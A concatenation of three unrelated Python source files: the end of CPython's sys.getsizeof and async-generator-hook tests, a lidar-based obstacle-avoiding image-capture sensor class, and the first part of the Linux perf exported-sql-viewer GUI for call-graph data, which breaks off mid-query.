def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('4Pi2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('15P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
if __name__ == "__main__":
unittest.main()
|
imagegatherer.py
|
import os
import cv2
from math import cos, sin, pi, floor
from adafruit_rplidar import RPLidar
import threading
import random
from datetime import datetime
import glob
from .sensorbase import SensorBase
class ImageGatherer(SensorBase):
def __init__(self, args):
super(ImageGatherer, self).__init__(args)
self.lidar = RPLidar(None, '/dev/ttyUSB0')
self.scan_data = [0]*360
self.snapshot_time = datetime.now()
image_paths = glob.glob("{}/*.jpg".format(args["imageoutput"]))
if image_paths:
self.snapshot_count = max([int(os.path.splitext(path.split(os.path.sep)[-1])[0]) for path in image_paths])
else:
self.snapshot_count = 0
print(self.lidar.info)
print(self.lidar.health)
t = threading.Thread(target=self._read_scans, args=())
t.daemon = True
t.start()
def _read_scans(self):
for scan in self.lidar.iter_scans():
for (_, angle, distance) in scan:
self.scan_data[min([359, floor(angle)])] = distance
def update_internal(self, frame):
# Capture a image
now = datetime.now()
if (now - self.snapshot_time).seconds > 5:
self.snapshot_time = now
# draw the timestamp on the frame
ts = datetime.now().strftime("%A %d %B %Y %I:%M:%S%p")
# write the current frame to output directory
filename = "{}.jpg".format(str(self.snapshot_count).zfill(16))
path = os.path.join(self.args["imageoutput"], filename)
print("[INFO] Saving captured image to ", path)
cv2.imwrite(path, frame)
self.snapshot_count += 1
r_multiplier = random.uniform(2.0, 3.0)
l_multiplier = 1.0
turn_duration = 2.0
dist_to_obstacle = 300
roi = self.scan_data[135:225]
if any((dist > 0 and dist < dist_to_obstacle) for dist in roi):
self.r_multiplier = r_multiplier if self.snapshot_count % 2 == 0 else l_multiplier
self.l_multiplier = l_multiplier if self.snapshot_count % 2 == 0 else r_multiplier
self.motor_duration = turn_duration
print("[INFO] Avoiding obstacle!")
return True
return False
def shutdown(self):
print("[INFO] Stopping rplidar")
self.lidar.stop()
self.lidar.disconnect()
|
exported-sql-viewer.py
|
#!/usr/bin/env python2
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
pyside_version_1 = True
from decimal import *
from ctypes import *
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox);
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data == None:
self.textbox.setItemData(index, pattern)
else:
self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, row, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.query_done = False;
self.child_count = 0
self.child_items = []
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time), SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
child_item = CallGraphLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, name, dso, count, time, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallGraphLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 1, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallGraphRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True;
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern patching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\%")
s = s.replace("_", "\_")
# Translate * and ? into SQL LIKE pattern characters % and _
trans = string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
